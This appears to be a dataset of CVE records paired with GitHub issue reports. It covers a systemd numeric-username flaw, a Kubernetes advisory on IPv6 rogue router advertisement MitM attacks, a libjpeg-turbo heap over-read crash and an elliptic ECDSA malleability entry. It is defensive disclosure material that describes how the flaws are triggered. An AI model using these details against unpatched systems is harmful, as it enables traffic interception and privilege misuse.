cve_id
stringlengths
13
16
cve_published
stringdate
2019-01-01 16:29:00
2025-02-25 20:15:37
cve_descriptions
stringlengths
34
2.6k
cve_metrics
dict
cve_references
listlengths
1
281
cve_configurations
listlengths
1
70
cve_cwe_list
listlengths
1
1
cve_primary_cwe
stringclasses
164 values
url
stringlengths
36
97
cve_tags
listlengths
1
5
domain
stringclasses
1 value
issue_owner_repo
listlengths
2
2
issue_body
stringlengths
0
198k
issue_title
stringlengths
1
335
issue_comments_url
stringlengths
55
116
issue_comments_count
int64
0
338
issue_created_at
stringdate
2012-06-06 09:34:24
2025-04-02 09:37:20
issue_updated_at
stringdate
2014-04-01 20:16:21
2025-06-16 12:26:58
issue_html_url
stringlengths
36
97
issue_github_id
int64
4.93M
2.97B
issue_number
int64
1
199k
__index_level_0__
int64
0
6.55k
CVE-2020-13776
2020-06-03T03:15:10.677
systemd through v245 mishandles numerical usernames such as ones composed of decimal digits or 0x followed by hex digits, as demonstrated by use of root privileges when privileges of the 0x0 user account were intended. NOTE: this issue exists because of an incomplete fix for CVE-2017-1000082.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "HIGH", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 6.2, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:L/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 1.9, "impactScore": 10, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 0.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/systemd/systemd/issues/15985" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IYGLFEKG45EYBJ7TPQMLWROWPTZBEU63/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200611-0003/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/systemd/systemd/issues/15985" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IYGLFEKG45EYBJ7TPQMLWROWPTZBEU63/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200611-0003/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:systemd_project:systemd:*:*:*:*:*:*:*:*", "matchCriteriaId": "10761C00-6450-4377-8DFC-16AE46BE54BB", "versionEndExcluding": null, "versionEndIncluding": "245", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vmware_vsphere:*:*", "matchCriteriaId": "3A756737-1CC4-42C2-A4DF-E1C893B4E2D5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:solidfire_\\&_hci_management_node:-:*:*:*:*:*:*:*", "matchCriteriaId": "D6D700C5-F67F-4FFB-BE69-D524592A3D2E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "269" ]
269
https://github.com/systemd/systemd/issues/15985
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "systemd", "systemd" ]
**Version the issue has been seen with** > `245` ea500ac513cf51bcb79a5666f1519499d029428f and the current `master` d904afc730268d50502f764dfd55b8cf4906c46f **Used distribution** > Ubuntu 20.04 LTS **Expected behaviour you didn't see** > ```bash > loginctl show-user $(id -u) > ``` > > ```ini > UID=1000 > GID=1000 > Name=0x2b3bfa0 > Timestamp=Sat 2020-05-30 23:37:28 CEST > TimestampMonotonic=405537243 > RuntimePath=/run/user/1000 > Service=user@1000.service > Slice=user-1000.slice > Display=2 > State=active > Sessions=16 2 > IdleHint=no > IdleSinceHint=1590909501087020 > IdleSinceHintMonotonic=5138907865 > Linger=no > ``` **Unexpected behaviour you saw** > ```bash > loginctl show-user $(id -u) > ``` > > ``` > Failed to get user: User ID 1000 is not logged in or lingering > ``` **Steps to reproduce the problem** > 1. Create a user whose name starts with `0x` or `0X` (_exempli gratia:_ `0x2b3bfa0`). > 2. Log in with that user name and run ` loginctl show-user $(id -u)`. > 3. Check the unexpected behavior above. **Affected code** https://github.com/systemd/systemd/blob/d904afc730268d50502f764dfd55b8cf4906c46f/src/basic/user-util.c#L717 https://github.com/systemd/systemd/blob/d904afc730268d50502f764dfd55b8cf4906c46f/src/basic/user-util.c#L52 https://github.com/systemd/systemd/blob/d904afc730268d50502f764dfd55b8cf4906c46f/src/basic/parse-util.h#L53 https://github.com/systemd/systemd/blob/d904afc730268d50502f764dfd55b8cf4906c46f/src/basic/parse-util.h#L49 https://github.com/systemd/systemd/blob/d904afc730268d50502f764dfd55b8cf4906c46f/src/basic/parse-util.c#L375 **Problem description** As per the [`strtoul(3)`](https://man7.org/linux/man-pages/man3/strtoul.3.html) `man` page, when the `base` argument is `0`, the string can also be interpreted as an hexadecimal or octal number: > _If `base` **is zero** or 16, the string may then include a "0x" prefix, and the number will be read in base 16; otherwise, a zero `base` is taken as 10 (decimal) unless the next character is '0', in which case it is taken as 8 (octal)._ **Vulnerability** > _[CVE-2020-13776](https://nvd.nist.gov/vuln/detail/CVE-2020-13776): systemd through v245 mishandles numerical usernames such as ones composed of decimal digits or 0x followed by hex digits, as demonstrated by use of root privileges when privileges of the 0x0 user account were intended._ **Related issues** * #15149 * #6237
User names beginning with 0x being interpreted as user identifiers
https://api.github.com/repos/systemd/systemd/issues/15985/comments
11
2020-05-31T09:13:53Z
2020-06-04T03:40:05Z
https://github.com/systemd/systemd/issues/15985
627,924,396
15,985
1,252
CVE-2020-13597
2020-06-03T17:15:24.887
Clusters using Calico (version 3.14.0 and below), Calico Enterprise (version 2.8.2 and below), may be vulnerable to information disclosure if IPv6 is enabled but unused. A compromised pod with sufficient privilege is able to reconfigure the node’s IPv6 interface due to the node accepting route advertisement by default, allowing the attacker to redirect full or partial network traffic from the node to the compromised pod.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 2.1, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:H/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.7, "source": "psirt@tigera.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.5, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "psirt@tigera.io", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/91507" }, { "source": "psirt@tigera.io", "tags": null, "url": "https://groups.google.com/forum/#%21topic/kubernetes-security-announce/BMb_6ICCfp8" }, { "source": "psirt@tigera.io", "tags": [ "Vendor Advisory" ], "url": "https://www.projectcalico.org/security-bulletins/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/91507" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://groups.google.com/forum/#%21topic/kubernetes-security-announce/BMb_6ICCfp8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://www.projectcalico.org/security-bulletins/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:projectcalico:calico:*:*:*:*:enterprise:*:*:*", "matchCriteriaId": "95DB38FE-A03E-456B-874A-A58C31BE7592", "versionEndExcluding": null, "versionEndIncluding": "2.6.2", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:projectcalico:calico:*:*:*:*:*:*:*:*", "matchCriteriaId": "CAFD1D82-33C2-4656-8E0F-ABF518E14C68", "versionEndExcluding": null, "versionEndIncluding": "3.8.8", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:projectcalico:calico:*:*:*:*:enterprise:*:*:*", "matchCriteriaId": "C016A3C9-D2ED-4CD6-93E1-2FF4876381C6", "versionEndExcluding": null, "versionEndIncluding": "2.7.4", "versionStartExcluding": null, "versionStartIncluding": "2.7.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:projectcalico:calico:*:*:*:*:enterprise:*:*:*", "matchCriteriaId": "0EB520BC-FACF-4C67-AFCD-73741DD633CD", "versionEndExcluding": null, "versionEndIncluding": "2.8.2", "versionStartExcluding": null, "versionStartIncluding": "2.8.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:projectcalico:calico:*:*:*:*:*:*:*:*", "matchCriteriaId": "7AEA624B-1358-4116-A19C-CF20513F0180", "versionEndExcluding": null, "versionEndIncluding": "3.9.5", "versionStartExcluding": null, "versionStartIncluding": "3.9.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:projectcalico:calico:*:*:*:*:*:*:*:*", "matchCriteriaId": "BBDF7B5C-D289-48D0-A9E9-D468D182D0E9", "versionEndExcluding": null, "versionEndIncluding": "3.10.3", "versionStartExcluding": null, "versionStartIncluding": "3.10.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:projectcalico:calico:*:*:*:*:*:*:*:*", "matchCriteriaId": "C1373217-1065-4919-ADC9-055B556D3A41", "versionEndExcluding": null, "versionEndIncluding": "3.11.2", "versionStartExcluding": null, "versionStartIncluding": "3.11.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:projectcalico:calico:*:*:*:*:*:*:*:*", "matchCriteriaId": "D4934106-DDAC-4E1B-BC8A-791EE911608F", "versionEndExcluding": null, "versionEndIncluding": "3.12.1", "versionStartExcluding": null, "versionStartIncluding": "3.12.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:projectcalico:calico:*:*:*:*:*:*:*:*", "matchCriteriaId": "CBB409FF-5177-4C87-A45F-072CE3A4D7ED", "versionEndExcluding": null, "versionEndIncluding": "3.13.3", "versionStartExcluding": null, "versionStartIncluding": "3.13.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:projectcalico:calico:3.14.0:*:*:*:*:*:*:*", "matchCriteriaId": "A78D854F-7BCB-4AF1-940E-AF61B469C0E5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "200" ]
200
https://github.com/kubernetes/kubernetes/issues/91507
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: [CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:L](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:L) (6.0 Medium) A cluster configured to use an affected container networking implementation is susceptible to man-in-the-middle (MitM) attacks. By sending “rogue” router advertisements, a malicious container can reconfigure the host to redirect part or all of the IPv6 traffic of the host to the attacker-controlled container. Even if there was no IPv6 traffic before, if the DNS returns A (IPv4) and AAAA (IPv6) records, many HTTP libraries will try to connect via IPv6 first then fallback to IPv4, giving an opportunity to the attacker to respond. ### Am I vulnerable? Kubernetes itself is not vulnerable. A Kubernetes cluster using an affected networking implementation is vulnerable. Binary releases of the kubelet installed from upstream Kubernetes Community repositories hosted at https://packages.cloud.google.com/ may have also installed the `kubernetes-cni` package containing the [containernetworking CNI plugins](https://github.com/containernetworking/plugins), which are affected by CVE-2020-10749. #### Affected Versions The following official kubelet package versions have an affected `kubernetes-cni` package as a dependency: - kubelet v1.18.0-v1.18.3 - kubelet v1.17.0-v1.17.6 - kubelet < v1.16.11 A cluster having an affected `kubernetes-cni` package installed is only affected if configured to use it. #### Third-party components and versions Many container networking implementations are affected, including: - CNI Plugins maintained by the containernetworking team, prior to version 0.8.6 (CVE-2020-10749) (See https://github.com/containernetworking/plugins/pull/484) - Calico and Calico Enterprise (CVE-2020-13597) Please refer to the Tigera Advisory TTA-2020-001 at https://www.projectcalico.org/security-bulletins/ for details - Docker versions prior to 19.03.11 (see https://github.com/docker/docker-ce/releases/v19.03.11) (CVE-2020-13401) - Flannel, all current versions - Weave Net, prior to version 2.6.3 It is believed that the following are not affected: - Cilium - Juniper Contrail Networking - OpenShift SDN - OVN-Kubernetes - Tungsten Fabric Information about the vulnerability status of any plugins or implementations not listed above is currently unavailable. Please contact the provider directly with questions about their implementation. ### How do I mitigate this vulnerability? - Set the host default to reject router advertisements. This should prevent attacks from succeeding, but may break legitimate traffic, depending upon the networking implementation and the network where the cluster is running. To change this setting, set the sysctl `net.ipv6.conf.all.accept_ra` to 0. - Use TLS with proper certificate validation - Disallow `CAP_NET_RAW` for untrusted workloads or users. For example, a Pod Security Policy with a `RequiredDropCapabilities` that includes `NET_RAW` will prevent this attack for controlled workloads. #### Fixed Versions The following packages will bundle fixed versions of the containernetworking CNI plugins that were formerly installed via the `kubernetes-cni` package. - kubelet v1.19.0+ (master branch #91370) - kubelet v1.18.4+ (#91387) - kubelet v1.17.7+ (#91386) - kubelet v1.16.11+ (#91388) Because these versions are not yet available, cluster administrators using packages from the Kubernetes repositories may choose to manually upgrade CNI plugins by retrieving the relevant arch tarball from the containernetworking/plugins [v0.8.6 release](https://github.com/containernetworking/plugins/releases/tag/v0.8.6). The patch versions are [expected to be released on June 17th](https://github.com/kubernetes/sig-release/blob/master/releases/patch-releases.md#timelines), subject to change. ## Additional Details #### Detection - The IPv6 routing table on nodes will show any attacker-created entries. For example, a host with IPv6 disabled might show no default route when running `ip -6 route` but the same host with an attack in progress might show an updated default route or a route to the target address(es). Any IPv6 route with a destination interface of a host-side container network interface should be investigated. - The host-side of a container network interface may show additional configured IPv6 addresses after receiving a rogue RA packet. For example, given a host-side interface of `cbr0` which might normally have no IPv6 address, a dynamic-configured address on the interface may signal an attack in progress. Use this command to view interface addresses: `ip a show dynamic cbr0` #### Affected configurations - Clusters using an affected networking implementation and allowing workloads to run with `CAP_NET_RAW privileges`. The default Kubernetes security context runs workloads with a capabilities bounding set that includes `CAP_NET_RAW`. #### Vulnerability impact - A user able to create containers with `CAP_NET_RAW` privileges on an affected cluster can intercept traffic from other containers on the host or from the host itself. #### Acknowledgements This vulnerability was reported by Etienne Champetier (@champtar). The issue was fixed by Casey Callendrello (@squeed) and maintainers of various container networking implementations. Updates to Kubernetes builds were coordinated by Stephen Augustus (@justaugustus) and Tim Pepper (@tpepper). /area security /kind bug /committee product-security /sig network
CVE-2020-10749: IPv4 only clusters susceptible to MitM attacks via IPv6 rogue router advertisements
https://api.github.com/repos/kubernetes/kubernetes/issues/91507/comments
7
2020-05-27T19:32:29Z
2022-09-14T11:48:50Z
https://github.com/kubernetes/kubernetes/issues/91507
625,973,443
91,507
1,253
CVE-2020-13790
2020-06-03T19:15:10.817
libjpeg-turbo 2.0.4, and mozjpeg 4.0.0, has a heap-based buffer over-read in get_rgb_row() in rdppm.c via a malformed PPM input file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00031.html" }, { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00062.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libjpeg-turbo/libjpeg-turbo/commit/3de15e0c344d11d4b90f4a47136467053eb2d09a" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/433" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2020/07/msg00033.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/P4D6KNUY7YANSPH7SVQ44PJKSABFKAUB/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/U6563YHSVZK24MPJXGJVK3CQG7JVWZGK/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://security.gentoo.org/glsa/202010-03" }, { "source": "cve@mitre.org", "tags": null, "url": "https://usn.ubuntu.com/4386-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00031.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00062.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libjpeg-turbo/libjpeg-turbo/commit/3de15e0c344d11d4b90f4a47136467053eb2d09a" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/433" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2020/07/msg00033.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/P4D6KNUY7YANSPH7SVQ44PJKSABFKAUB/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/U6563YHSVZK24MPJXGJVK3CQG7JVWZGK/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.gentoo.org/glsa/202010-03" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://usn.ubuntu.com/4386-1/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libjpeg-turbo:libjpeg-turbo:2.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "F91F79CC-B2C4-4D9E-99AA-5D6A49D41561", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:mozilla:mozjpeg:4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "EA6BBD46-8949-4596-9C32-4593916A6D10", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/libjpeg-turbo/libjpeg-turbo/issues/433
[ "Exploit", "Third Party Advisory" ]
github.com
[ "libjpeg-turbo", "libjpeg-turbo" ]
**Have you searched the existing issues (both open and closed) in the libjpeg-turbo issue tracker to ensure that this bug report is not a duplicate?** Yes **Does this bug report describe one of the [two known and unsolvable issues with the JPEG format](https://libjpeg-turbo.org/pmwiki/uploads/About/TwoIssueswiththeJPEGStandard.pdf)?** No **Clear and concise description of the bug:** Heap-based buffer over-read in get_rgb_row() in rdppm.c **Steps to reproduce the bug (using *only* libjpeg-turbo):** Compile with Address Sanitizer (ASan) : ./cjpeg ./reproducer Without ASan: valgrind -q ./cjpeg ./reproducer **Image(s) needed in order to reproduce the bug (if applicable):** [reproducer.zip](https://github.com/libjpeg-turbo/libjpeg-turbo/files/4678450/reproducer.zip) **Expected behavior:** **Observed behavior:** ``` ==2127==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62900000417f at pc 0x55f48a780991 bp 0x7ffccfe84010 sp 0x7ffccfe84000 READ of size 1 at 0x62900000417f thread T0 #0 0x55f48a780990 in get_rgb_row libjpeg-turbo/rdppm.c:434 #1 0x55f48a77cadd in main libjpeg-turbo/cjpeg.c:664 #2 0x7f9476b50b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #3 0x55f48a77d049 in _start (libjpeg-turbo/build/cjpeg+0x6049) 0x62900000417f is located 104 bytes to the right of 16151-byte region [0x629000000200,0x629000004117) allocated by thread T0 here: #0 0x7f947730db40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40) #1 0x7f9476fea6cb in alloc_small libjpeg-turbo/jmemmgr.c:318 #2 0x55f48a785157 in jinit_read_ppm libjpeg-turbo/rdppm.c:756 #3 0x55f48a77c8cb in select_file_type libjpeg-turbo/cjpeg.c:118 #4 0x55f48a77c8cb in main libjpeg-turbo/cjpeg.c:636 #5 0x7f9476b50b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) SUMMARY: AddressSanitizer: heap-buffer-overflow libjpeg-turbo/rdppm.c:434 in get_rgb_row Shadow bytes around the buggy address: 0x0c527fff87d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c527fff87e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c527fff87f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c527fff8800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c527fff8810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c527fff8820: 00 00 07 fa fa fa fa fa fa fa fa fa fa fa fa[fa] 0x0c527fff8830: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c527fff8840: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c527fff8850: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c527fff8860: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c527fff8870: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==2127==ABORTING ``` **Platform(s) (compiler version, operating system version, CPU) on which the bug was observed:** gcc (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0, Linux 5.3.0-51-generic **libjpeg-turbo release(s), commit(s), or branch(es) in which the bug was observed (always test the tip of the master branch or the latest [stable pre-release](https://libjpeg-turbo.org/DeveloperInfo/PreReleases) to verify that the bug hasn't already been fixed):** libjpeg-turbo version 2.0.5 (master) **If the bug is a regression, the specific commit that introduced the regression (use `git bisect` to determine this):** **Additional information:**
Heap-based buffer over-read in get_rgb_row() in rdppm.c
https://api.github.com/repos/libjpeg-turbo/libjpeg-turbo/issues/433/comments
3
2020-05-25T18:37:38Z
2020-11-04T03:26:12Z
https://github.com/libjpeg-turbo/libjpeg-turbo/issues/433
624,437,621
433
1,254
CVE-2020-13822
2020-06-04T15:15:13.510
The Elliptic package 6.5.2 for Node.js allows ECDSA signature malleability via variations in encoding, leading '\0' bytes, or integer overflows. This could conceivably have a security-relevant impact if an application relied on a single canonical signature.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.7, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 5.5, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/indutny/elliptic/issues/226" }, { "source": "cve@mitre.org", "tags": null, "url": "https://medium.com/%40herman_10687/malleability-attack-why-it-matters-7b5f59fb99a4" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.npmjs.com/package/elliptic" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://yondon.blog/2019/01/01/how-not-to-use-ecdsa/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/indutny/elliptic/issues/226" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://medium.com/%40herman_10687/malleability-attack-why-it-matters-7b5f59fb99a4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.npmjs.com/package/elliptic" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://yondon.blog/2019/01/01/how-not-to-use-ecdsa/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:indutny:elliptic:6.5.2:*:*:*:*:node.js:*:*", "matchCriteriaId": "E5343FAF-0200-473D-922C-51CB46D28A7F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "190" ]
190
https://github.com/indutny/elliptic/issues/226
[ "Exploit", "Third Party Advisory" ]
github.com
[ "indutny", "elliptic" ]
